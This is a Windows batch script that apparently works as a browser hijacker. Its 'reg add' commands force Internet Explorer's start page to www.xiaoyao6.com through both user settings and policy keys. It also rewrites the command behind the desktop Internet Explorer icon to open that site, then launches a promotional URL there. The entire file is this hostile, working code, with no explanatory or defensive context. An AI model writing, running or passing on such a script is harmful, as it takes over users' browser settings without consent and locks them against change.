@echo off
set regpath="HKCR\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" "HKCU\SOFTWARE\Policies\Microsoft\Internet Explorer\Main" "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main" 
set reglist1=Start Page-"www.xiaoyao6.com" 
set reglist2=""-reg_expand_sz-"C:\Program Files\Internet Explorer\iexplore.exe www.xiaoyao6.com"
for %%a in (%regpath%) do (
   if %%a=="HKCR\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" (
     for /f "delims=- tokens=1-3" %%b in ("%reglist2%") do (reg add %%a /v %%b /t %%c /d %%d /f)
   ) else (
     for /f "delims=- tokens=1-2" %%e in ("%reglist1%") do (reg add %%a /v "%%e" /d %%f /f)
   )
)
start http://www.xiaoyao6.com/qb/500qb.php?rj